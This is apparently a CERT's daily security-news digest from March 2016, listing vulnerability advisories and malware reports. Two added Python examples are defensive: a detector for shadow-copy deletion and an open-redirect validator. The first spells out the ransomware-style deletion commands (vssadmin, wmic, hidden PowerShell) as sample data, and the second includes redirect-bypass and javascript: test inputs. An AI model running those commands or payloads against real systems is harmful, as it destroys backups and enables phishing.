http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** IBM Security Bulletin ***
---------------------------------------------
*** IBM Rational DOORS Web Access is affected by Apache Tomcat vulnerabilities (CVE-2015-5345, CVE-2015-5351) ***
http://www.ibm.com/support/docview.wss?uid=swg21978300
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Rational ClearCase (CVE-2015-7575, CVE-2015-4872, CVE-2015-4893, CVE-2015-4803) ***
http://www.ibm.com/support/docview.wss?uid=swg21976573
---------------------------------------------
*** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry (CVE-2015-7713, CVE-2015-5286) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023399
---------------------------------------------
*** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry(CVE-2015-5163 CVE-2015-3241 CVE-2015-5223) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023469
---------------------------------------------
*** IBM Security Bulletin: OpenStack vulnerabilities affect IBM Cloud Manager with Openstack (CVE-2015-5163 CVE-2015-3241 CVE-2015-5223) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023470
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 15-03-2016 18:00 − Wednesday 16-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Bugtraq: [security bulletin] HPSBGN03556 rev.1 - ArcSight ESM and ESM Express, Remote Arbitrary File Download, Local Arbitrary Command Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537801
*** Exploit Kits in 2015: Scale and Distribution ***
---------------------------------------------
In the first part of this series of blog posts, we discussed what new developments and changes in the exploit kit landscape were seen in 2015. In this post, we look at the scale of the exploit kit problem - how many users were affected, ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/exploit-kits-201…
*** Apache Struts Input Validation Flaw in I18NInterceptor Lets Remote Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035272
*** Apache Struts Double OGNL Evaluation Lets Remote Users Execute Arbitrary Code on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1035271
*** VMware vRealizes that vRealize has XSS bugs on Linux ***
---------------------------------------------
Virtzilla also released first maintenance release for vRealize Automation
A tricky Tuesday for VMware's vRealize products, which have received the first maintenance release for version 7 and also become the subject of a security alert.
---------------------------------------------
www.theregister.co.uk/2016/03/16/vmware_vrealizes_that_vrealize_has_xss_bug…
*** OpenSSH 7.2p1 xauth Command Injection / Bypass ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030083
*** TeslaCrypt 3.1? New Ransomware Strain Removes ShadowCopies via WMI ***
---------------------------------------------
The authors of the TeslaCrypt 3.1 ransomware understood that the common ransomware action of deleting shadow copies by executing "vssadmin Delete Shadows /All /Quiet" draws defenders' attention, and so they worked around that by using WMI.
---------------------------------------------
http://www.minerva-labs.com/
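Detection logic for the behaviour described in this item, added here as an example; it is not code from the Minerva write-up and not TeslaCrypt's own. The rules match the vssadmin command line quoted above and the WMI routes to the same result (wmic.exe's ShadowCopy alias with the Delete verb, and PowerShell removing Win32_ShadowCopy instances), which is where the WMI workaround shows up in process-creation telemetry. The event records are constructed, with field names modelled on Sysmon event ID 1; the parent-process heuristic and the severity levels are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names modelled on Sysmon event ID 1)."""
    image: str
    command_line: str
    parent_image: str


# Rule name -> pattern applied to the lower-cased, whitespace-collapsed command line.
RULES = [
    ("vssadmin_delete_shadows",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b")),
    ("vssadmin_resize_shadowstorage",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\b.*\bshadowstorage\b")),
    # The WMI route via wmic.exe: the ShadowCopy alias with the Delete verb.
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    # The WMI route via PowerShell: Win32_ShadowCopy instances removed or deleted.
    ("powershell_win32_shadowcopy_delete",
     re.compile(r"win32_shadowcopy\b.*(remove-wmiobject|remove-ciminstance|\.delete\(\))")),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def normalise(command_line: str) -> str:
    """Lower-case and collapse whitespace so casing and padding cannot dodge the rules."""
    return re.sub(r"\s+", " ", command_line).strip().lower()


def parent_is_suspicious(parent_image: str) -> bool:
    """Heuristic (this example's own choice): shadow-copy tooling launched from a
    user-writable directory or from an Office application is far more likely to be
    malware than administrator work."""
    p = parent_image.lower()
    name = p.rsplit("\\", 1)[-1]
    return ("\\appdata\\" in p or "\\temp\\" in p or "\\users\\public\\" in p
            or name in OFFICE_PARENTS)


def detect(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Return one alert per event whose command line matches a rule (first match wins)."""
    alerts = []
    for ev in events:
        cmd = normalise(ev.command_line)
        for name, pattern in RULES:
            if pattern.search(cmd):
                alerts.append({
                    "rule": name,
                    "severity": "high" if parent_is_suspicious(ev.parent_image) else "medium",
                    "parent": ev.parent_image,
                    "command_line": ev.command_line,
                })
                break
    return alerts


# Constructed sample telemetry (not from a real incident): three deletions, two benign lookups.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",
              r'"C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe",
              r'"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive',
              r"C:\Users\alice\AppData\Roaming\updater.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"',
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\vssadmin.exe",
              "vssadmin list shadows",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic shadowcopy list brief",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["severity"]:<6} {alert["rule"]:<36} parent={alert["parent"]}')
```

A command-line rule only sees WMI use that goes through wmic.exe or PowerShell. A sample that calls the Win32_ShadowCopy Delete method directly from its own process, through COM, spawns no child process and leaves nothing for these rules to match, so the Microsoft-Windows-WMI-Activity/Operational log is the complementary source to collect for that case.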
*** subsearch ***
---------------------------------------------
subsearch is a command line tool designed to brute force subdomain names. It is aimed at penetration testers and bug bounty hunters and has been built with a focus on speed, stealth and reporting.
---------------------------------------------
https://github.com/gavia/subsearch
*** Git Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1035290
*** FortiOS open redirect vulnerability ***
---------------------------------------------
The FortiOS web UI accepts user-controlled input that specifies a link to an external site and uses that link in a redirect. The redirect input parameter is also prone to cross-site scripting.
---------------------------------------------
http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
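The open-redirect pattern the advisory describes, shown generically as an added example that is neither FortiOS code nor taken from the advisory: a handler that trusts the redirect parameter verbatim, next to a validator that only lets the target stay on the application's own origin or on an allow-listed host. The `redir` parameter name, the `ALLOWED_HOSTS` set and the `vpn.example.com` host are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumption for the example: the only external host the application may send users to.
ALLOWED_HOSTS = {"vpn.example.com"}


def redirect_target_unsafe(params: dict) -> str:
    """The vulnerable pattern: whatever arrives in the parameter is handed to the redirect."""
    return params.get("redir", "/")


def redirect_target_safe(params: dict, allowed_hosts=ALLOWED_HOSTS, default: str = "/") -> str:
    """Return the requested target only if it stays on this origin or an allow-listed host;
    otherwise fall back to a fixed, safe default."""
    target = params.get("redir", "")
    if not target:
        return default
    # Reject control characters and whitespace before parsing: browsers strip some of them
    # ("java\tscript:"), so a parser that keeps them sees a different URL than the browser.
    if any(ord(c) < 0x20 or c.isspace() for c in target):
        return default
    # Browsers treat "\" like "/" in the scheme and authority part, so "/\evil.example" is
    # scheme-relative to the browser; normalise first so the parser agrees with it.
    normalised = target.replace("\\", "/")
    try:
        parts = urlsplit(normalised)
    except ValueError:            # e.g. unbalanced IPv6 brackets in the host
        return default
    if parts.scheme == "" and parts.netloc == "":
        # Same-origin relative target: allow absolute paths only, never "//host" or "///host".
        if normalised.startswith("/") and not normalised.startswith("//"):
            return normalised
        return default
    if parts.scheme.lower() not in ("http", "https"):
        return default            # javascript:, data:, vbscript: and friends
    # "https://vpn.example.com@evil.example" parses with the allowed name as userinfo and
    # the attacker's host as hostname; reject any userinfo outright rather than reason about it.
    if parts.username is not None or parts.password is not None:
        return default
    # hostname is lower-cased and excludes the port, so the comparison is exact.
    if parts.hostname is None or parts.hostname not in allowed_hosts:
        return default
    return normalised


if __name__ == "__main__":
    # Constructed inputs covering the usual bypass attempts.
    for candidate in ["/account", "//evil.example/", "/\\evil.example/",
                      "https://vpn.example.com@evil.example/", "javascript:alert(1)",
                      "https://vpn.example.com/login"]:
        print(f"{candidate!r:45} -> {redirect_target_safe({'redir': candidate})!r}")
```

Checking the raw string against a prefix such as `https://vpn.example.com` is not enough: `https://vpn.example.com.evil.example` and `https://vpn.example.com@evil.example` both pass a prefix test, and only parsing and comparing the host exactly closes them. Rejecting non-http(s) schemes also removes the `javascript:` variant through which the same parameter becomes a cross-site scripting sink, though output encoding wherever the value is reflected is still required.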
*** IBM Security Bulletin: Vulnerabilities in java affect Power Hardware Management Console (CVE-2016-0448) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=nas8N1021172
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect Tivoli Provisioning Manager for OS Deployment and Tivoli Provisioning Manager for Images (CVE-2016-0777, CVE-2016-0778) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21978487
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM WebSphere MQ (CVE-2015-1788) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21972125
*** DDoSing with Other Peoples Botnets ***
---------------------------------------------
While I was reverse engineering ZeroAccess in order to write a monitoring system, I had an idea which would allow me to use ZeroAccess C&C infrastructure to reflect and amplify a UDP based DDoS attack, which I'd found to be beautifully ironic. After further analysis, I discovered it may even be possible to use non-worker bots (which connect from behind NAT) to participate in the attack.
---------------------------------------------
http://www.malwaretech.com/2016/03/ddosing-with-other-peoples-botnets.html
*** DFN-CERT-2016-0461: Foxit Reader, Foxit PhantomPDF: Multiple vulnerabilities allow, among other things, various denial-of-service attacks ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0461/
*** Nude photos of celebrities: suspect admits phishing attack on iCloud ***
---------------------------------------------
In the proceedings over the publication of private celebrity photos, the suspect has pleaded guilty to phishing. But the man claims to have had nothing to do with publishing the pictures.
---------------------------------------------
http://www.golem.de/news/nacktfotos-von-prominenten-verdaechtiger-gesteht-p…
*** HTTPS: 77 percent of all Google requests encrypted ***
---------------------------------------------
In its transparency report, Google now also documents the percentage of transport encryption for its own services and for requests to the search engine's servers. The high figure for ad delivery is particularly surprising.
---------------------------------------------
http://heise.de/-3140351
*** Ransomware on websites of the New York Times and BBC ***
---------------------------------------------
Potentially millions of users at risk; security researchers see evidence of weaknesses in the ad network.
---------------------------------------------
http://derstandard.at/2000033046874
*** AceDeceiver: iOS Trojan exploits weaknesses in Apple's DRM ***
---------------------------------------------
According to a security firm, attackers have repeatedly succeeded in getting malware into the App Store unhindered. Thanks to weaknesses in Apple's FairPlay DRM, the malware can also reach iPhones without an enterprise certificate.
---------------------------------------------
http://heise.de/-3140627
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 14-03-2016 18:00 − Tuesday 15-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Typosquatters Target Mac Users With New '.om' Domain Scam ***
---------------------------------------------
http://threatpost.com/typosquatters-target-apple-mac-users-with-new-om-doma…
*** Juniper: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800) ***
---------------------------------------------
On March 1, 2016, a cross-protocol attack was announced by OpenSSL that could lead to decryption of TLS sessions by using a server supporting SSLv2 and EXPORT cipher suites as a Bleichenbacher RSA padding oracle. Note that traffic between clients and non-vulnerable servers can be decrypted provided another server supporting SSLv2 and EXPORT ciphers (even with a different protocol such as SMTP, IMAP or POP) shares the RSA keys of the non-vulnerable server. This vulnerability is known as DROWN (CVE-2016-0800).
---------------------------------------------
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10722
*** Citrix XenApp and XenDesktop Hardening Guidance ***
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2016/03/citrix_xenapp_andxe.ht…
*** Complete Tour of PE and ELF: Part 2 ***
---------------------------------------------
We covered some important sections in Part 1 of this series. In this part, we will cover some more complex data structures covering some important concepts of binaries. Here is what we are looking at: If you can recall in Optional header, ..
---------------------------------------------
http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-2/
*** Adrian Dabrowski @ Troopers TelcoSecDay 2016 ***
---------------------------------------------
Today Adrian Dabrowski gives his talk 'Towards Carrier Based IMSI Catcher Detection' at the TelcoSecDay 2016. Abstract: In this presentation we discuss multiple detection capabilities of IMSI Catchers (aka Stingray) from the network ..
---------------------------------------------
https://www.sba-research.org/2016/03/15/adrian-dabrowski-troopers-telcosecd…
*** How broken is SHA-1 really? ***
---------------------------------------------
SHA-1 collisions may be found in the next few months, but that doesn't mean that fake SHA-1-based certificates will be created in the near future. Nevertheless, it is time for everyone, and those working in security in particular, to move away from outdated hash functions.
---------------------------------------------
https://www.virusbulletin.com/blog/2016/march-2016/how-broken-sha-1-really/
*** BSI guide on dealing with ransomware Trojans ***
---------------------------------------------
In a brief guide, the BSI informs public authorities and companies about the threat posed by crypto Trojans and how to respond when the worst happens.
---------------------------------------------
http://heise.de/-3135866
*** From Stolen Wallet to ID Theft, Wrongful Arrest ***
---------------------------------------------
It's remarkable how quickly a stolen purse or wallet can morph into full-blown identity theft, and possibly even result in the victim's wrongful arrest. All of the above was visited recently on a fellow infosec professional whose admitted lapse in physical security led to a mistaken early morning arrest in front of his kids.
---------------------------------------------
http://krebsonsecurity.com/2016/03/from-stolen-wallet-to-id-theft-wrongful-…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 11-03-2016 18:00 − Monday 14-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** VU#713312: DTE Energy Insight app vulnerable to information exposure ***
---------------------------------------------
The DTE Energy Insight app API allows an authenticated user to obtain and query certain limited customer information from other customers.
---------------------------------------------
http://www.kb.cert.org/vuls/id/713312
*** More than two-year-old Java security patch from Oracle still vulnerable ***
---------------------------------------------
According to security expert Adam Gowdiak, more than two years ago Oracle misjudged a security vulnerability and also botched the patch that was supposed to eliminate the bug.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Mehr-als-zwei-Jahre-alter-Java-Secur…
*** The Source of All Major Android Banking Trojans Just Got Updated To V2 ***
---------------------------------------------
An anonymous reader writes: Apparently, during the past months it has started coming to the surface the fact that most top-tier Android malware was actually related, coming from a common malware variant called GM Bot, and sold for only ..
---------------------------------------------
http://news.slashdot.org/story/16/03/12/1556259/the-source-of-all-major-and…
*** Google Chrome Extension Caught Stealing Bitcoin From Users ***
---------------------------------------------
An anonymous reader writes: Bitcoin exchange portal Bitstamp is warning users of a Google Chrome extension that steals their Bitcoin when making a transfer. According to Bitstamp, this extension contains malicious code that is redirecting ..
---------------------------------------------
http://news.slashdot.org/story/16/03/12/2328254/google-chrome-extension-cau…
*** Armada Collective is back, extorting Financial Institutions in Switzerland ***
---------------------------------------------
These extortion emails usually originate from free email service providers (such as Gmail or Openmail) and are being sent to the info@ email address of the targeted financial institution. Unlike the extortion attempts conducted by Armada Collective in September 2015, we are not aware of ..
---------------------------------------------
http://www.govcert.admin.ch/blog/19/armada-collective-is-back-extorting-fin…
*** Auto vulnerability scanners turn up mostly false positives ***
---------------------------------------------
Automated vulnerability scanners turn up mostly false positives, but even the wild goose chase that results can be cheaper for businesses than manual processes, according to NCC Group security engineer Clint Gibler.
---------------------------------------------
http://www.theregister.co.uk/2016/03/14/cheap_auto_vulnerability_scanners_c…
*** SSA-833048 (Last Update 2016-03-14): Vulnerability in SIMATIC S7-1200 CPUs prior to V4 ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-833048…
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects TS4500 (CVE-2015-7547) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1005695
*** IBM Security Bulletin: glibc getaddrinfo stack-based buffer overflow (CVE-2015-7547) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=isg3T1023395
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security Network Protection ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21975835
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM SmartCloud Entry (CVE-2016-0475 CVE-2016-0448 CVE-2015-7575 CVE-2016-0466) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=isg3T1023378
*** Botnets Plague the Web. This AI Is Out to Stop Them ***
---------------------------------------------
A group of Israeli researchers believe they are the first to have discovered a way to locate botnets and identify who is behind them, by planting honeypots that gather information about attacks carried out by the network, and analyzing that data with machine learning programs.
---------------------------------------------
https://motherboard.vice.com/read/botnets-plague-the-web-this-ai-is-out-to-…
*** Broken 2013 Java Patch Leads to Sandbox Bypass ***
---------------------------------------------
A patch for a critical 2013 Java vulnerability is incomplete, and exposes Java servers and clients to a sandbox bypass, researchers at Security Explorations of Poland said.
---------------------------------------------
http://threatpost.com/broken-2013-java-patch-leads-to-sandbox-bypass/116757/
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 10-03-2016 18:00 − Friday 11-03-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Locky Ransomware Spreading in Massive Spam Attack ***
---------------------------------------------
Researchers are tracking a massive spam campaign pelting inboxes with Locky ransomware downloaders in the form of JavaScript attachments.
---------------------------------------------
http://threatpost.com/locky-ransomware-spreading-in-massive-spam-attack/116…
*** Uninstall or update: Adobe distributes emergency update for Flash ***
---------------------------------------------
It comes as no surprise: Adobe is again releasing an emergency update for Flash Player. Anyone who has not already uninstalled it should install the update. Digital Editions and Adobe Reader are also being updated.
---------------------------------------------
http://www.golem.de/news/deinstallieren-oder-aktualisieren-adobe-rollt-notf…
*** Security Afterworks Spezial: Secure your Enterprise - Innovative Microsoft security solutions for the enterprise and mobility environment ***
---------------------------------------------
April 18, 2016 - 3:00 pm - 5:00 pm, Microsoft Österreich, Am Europlatz 3, Wien
---------------------------------------------
https://www.sba-research.org/events/security-afterworks-spezial-secure-your…
*** Files compromised by ransomware Trojan for OS X can be decrypted by Doctor Web ***
---------------------------------------------
March 11, 2016. At the beginning of March, numerous mass media, websites, and blogs announced the emergence of the first ever ransomware for Mac computers. Doctor Web specialists examined this malicious program, which was named Mac.Trojan.KeRanger.2, and they have developed a method that can help to decrypt files affected by this Trojan. Mac.Trojan.KeRanger.2 was first detected in a compromised version of the installer for a popular OS X torrent client that was distributed as a DMG file.
---------------------------------------------
http://news.drweb.com/show/?i=9877&lng=en&c=9
*** Cerber Ransomware - New, But Mature ***
---------------------------------------------
We take a look at Cerber, ransomware named after the mythical multi-headed dog...
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2016/03/cerber-ransomware-new-bu…
*** OpenSSH Security Advisory: x11fwd.adv ***
---------------------------------------------
Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1).
---------------------------------------------
http://www.openssh.com/txt/x11fwd.adv
*** Cisco Gigabit Switch Router 12000 Series Routers Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Schneider Electric Telvent RTU Improper Ethernet Frame Padding Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a vulnerability caused by an Institute of Electrical and Electronics Engineers (IEEE) conformance issue involving improper frame padding in Schneider Electric's Telvent SAGE 2300 and 2400 remote terminal units.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-070-01
*** VU#270232: Quagga bgpd with BGP peers enabled for VPNv4 contains a buffer overflow vulnerability ***
---------------------------------------------
Original Release date: 10 Mar 2016 | Last revised: 10 Mar 2016. Overview: Quagga, version 0.99.24.1 and earlier, contains a buffer overflow vulnerability in bgpd with BGP peers enabled for VPNv4 that may be leveraged to gain code execution. Description: CWE-121: Stack-based Buffer Overflow - CVE-2016-2342. Quagga is a software routing suite that implements numerous routing protocols for...
---------------------------------------------
http://www.kb.cert.org/vuls/id/270232
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects Tivoli Provisioning Manager for OS deployment and Tivoli Provisioning Manager for Images (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21978194
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM DataPower Gateways (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=swg21977460
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects Rational Publishing Engine (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21978188
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM DataPower Gateways (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974969
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in the GSKit component of IBM DB2 LUW (CVE-2016-0201, CVE-2015-7420 & CVE-2015-7421) ***
http://www.ibm.com/support/docview.wss?uid=swg21977787
---------------------------------------------
*** IBM Security Bulletin: Cross-Site Scripting Vulnerability with the UML Vizualization tools ***
http://www.ibm.com/support/docview.wss?uid=swg21978003
---------------------------------------------
*** Security Bulletin: Vulnerability in lighttpd affects IBM Integrated Management Module (IMM)(CVE-2015-3200) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099226
---------------------------------------------
*** IBM Security Bulletin: The GPFS pattern provided with IBM PureApplication System is affected by a security vulnerability. (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21978471
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 09-03-2016 18:00 − Thursday 10-03-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** First Principles for Network Defenders: A Unified Theory for Security Practitioners ***
---------------------------------------------
Great thinkers like Aristotle, Descartes and Elon Musk have said that, in order to solve really hard problems, you have to get back to first principles. First principles in a designated ..
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/03/first-principles-for-net…
*** DSA-3509 rails - security update ***
---------------------------------------------
Two vulnerabilities have been discovered in Rails, a web application framework written in Ruby. Both vulnerabilities affect Action Pack, which handles the web requests for Rails.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3509
*** Powershell Malware - No Hard drive, Just hard times, (Wed, Mar 9th) ***
---------------------------------------------
ISC Reader Eric Volking submitted a very nice sample of some Powershell based malware. Let's take a look! The malware starts in the traditional way, by launching itself with an ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20823
*** Bugtraq: [CORE-2016-0004] - SAP Download Manager Password Weak Encryption ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537746
*** Bugtraq: [CORE-2016-0003] - Samsung SW Update Tool MiTM ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537750
*** DSA-3512 libotr - security update ***
---------------------------------------------
Markus Vervier of X41 D-Sec GmbH discovered an integer overflow vulnerability in libotr, an off-the-record (OTR) messaging library, in the way the sizes of portions of incoming messages were stored. A remote attacker can exploit this ..
---------------------------------------------
https://www.debian.org/security/2016/dsa-3512
*** DSA-3511 bind9 - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3511
*** Security Advisory: BIND vulnerability CVE-2016-2088 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/59/sol59692558.html
*** Security Advisory: BIND vulnerability CVE-2016-1285 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/46/sol46264120.html
*** Security Advisory: BIND vulnerability CVE-2016-1286 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/62/sol62012529.html
*** Scald File - Critical - Remote Code Execution - SA-CONTRIB-2016-015 ***
---------------------------------------------
When a PDF is uploaded in Scald File, various tools can be executed if they're installed on the server, to try to generate a thumbnail out of that PDF. This is mitigated by the need to have the sufficient permissions to upload a file in Scald, ..
---------------------------------------------
https://www.drupal.org/node/2684601
*** Ransomware: "Paying is not advisable" ***
---------------------------------------------
DDoS attacks, CEO fraud and ransomware: attacks on companies are on the rise. futurezone asked security expert Michael Krausz about it.
---------------------------------------------
http://futurezone.at/digital-life/ransomware-von-zahlungen-ist-abzuraten/18…
*** Ransomware Trojan: Time Machine backups vulnerable ***
---------------------------------------------
The developers of the OS X ransomware KeRanger also considered Time Machine backups as a target. It is indeed possible to modify documents in the backup even without admin rights.
---------------------------------------------
http://heise.de/-3131762
*** TRUST 2016, organized by SBA Research ***
---------------------------------------------
August 29, 2016 - August 30, 2016 - All Day, Vienna University of Technology, Gußhausstraße 27-29, Vienna
---------------------------------------------
https://www.sba-research.org/events/trust-2016-organized-by-sba-research/
*** Critical vulnerability in Jabber encryption OTR ***
---------------------------------------------
The Off-the-Record (OTR) protocol and its implementation were actually considered quite secure. But now researchers have discovered a critical vulnerability that allows attackers to inject and execute their own code. Updates close the hole.
---------------------------------------------
http://heise.de/-3130396
*** PlugX malware: A good hacker is an apologetic hacker ***
---------------------------------------------
Sometimes malware writers put messages in their malware. We found one such message in PlugX dropper. And it was pretty melodramatic ..
---------------------------------------------
http://securelist.com/blog/virus-watch/74150/plugx-malware-a-good-hacker-is…
*** [R4] OpenSSL 20160301 Advisory Affects Tenable Nessus ***
---------------------------------------------
https://www.tenable.com/security/tns-2016-03
*** Apple Software Update 2.2 ***
---------------------------------------------
Impact: An attacker in a privileged network position may be able to control the contents of the updates window
---------------------------------------------
https://support.apple.com/en-us/HT206091
*** Vulnerabilities in multiple third party TYPO3 CMS extensions ***
---------------------------------------------
It has been discovered that the extension "phpMyAdmin" (phpmyadmin) is susceptible to unsafe comparison of XSRF/CSRF token, multiple full path disclosure vulnerabilities, multiple XSS vulnerabilities, insecure password generation in JavaScript.
---------------------------------------------
https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-…
*** Security: DROWN continues to threaten numerous web services ***
---------------------------------------------
How quickly are server operators patching the DROWN vulnerability? Apparently too slowly, say several security firms. With Heartbleed it went much better.
---------------------------------------------
http://www.golem.de/news/security-drown-gefaehrdet-weiterhin-zahlreiche-web…
*** Android mobile banking trojan uses layered defenses to avoid removal ***
---------------------------------------------
Researchers at ESET have spotted a new Android banking trojan that camouflages itself as a legitimate mobile banking app, but instead of giving access to a person's bank account it steals login credentials.
---------------------------------------------
http://www.scmagazine.com/android-mobile-banking-trojan-uses-layered-defens…
*** Cisco Prime LAN Management Solution Default Decryption Key Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Security Updates Available for Adobe Flash Player (APSB16-08) ***
---------------------------------------------
A Security Bulletin (APSB16-08) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using ..
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1327
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 08-03-2016 18:00 − Wednesday 09-03-2016 18:00
Handler: n/a
Co-Handler: Stephan Richter
*** Apple denies researchers' claims of bypassing iOS passcode using Siri ***
---------------------------------------------
Vulnerability Lab researchers claim to have spotted multiple passcode bypass vulnerabilities in the latest Apple iOS systems.
---------------------------------------------
http://www.scmagazine.com/researchers-says-ios-has-passcode-bypass-vulnerab…
*** Microsoft Patch Day: five critical vulnerabilities, all Windows versions affected ***
---------------------------------------------
This month Microsoft is distributing a total of 13 updates for Windows, Office and its two browsers, Internet Explorer and Edge. Several vulnerabilities allow Windows machines to be hijacked remotely.
---------------------------------------------
http://heise.de/-3131122
*** Trivial path for DDoS amplification attacks found by infosec bods ***
---------------------------------------------
600,000 servers are vulnerable to this little-known protocol. Security researchers have discovered a new vector for DDoS amplification attacks - and it's quite literally trivial.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/03/09/trivial_ddo…
*** KeRanger Mac ransomware is a rewrite of Linux Encoder ***
---------------------------------------------
KeRanger, the recently discovered first functional Mac ransomware, is a copy of Linux Encoder, the crypto-ransomware first unearthed and analyzed in November 2015 by Dr. Web researchers. "The encryption functions are identical and have the same names: encrypt_file, recursive_task, currentTimestamp and createDaemon to only mention a few. The encryption routine is identical to the one employed in Linux.Encoder", explained Catalin Cosoi, Chief Security Strategist at Bitdefender.
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/09/keranger-mac-ransomware-rewrite-…
*** A Wall Against Cryptowall? Some Tips for Preventing Ransomware, (Wed, Mar 9th) ***
---------------------------------------------
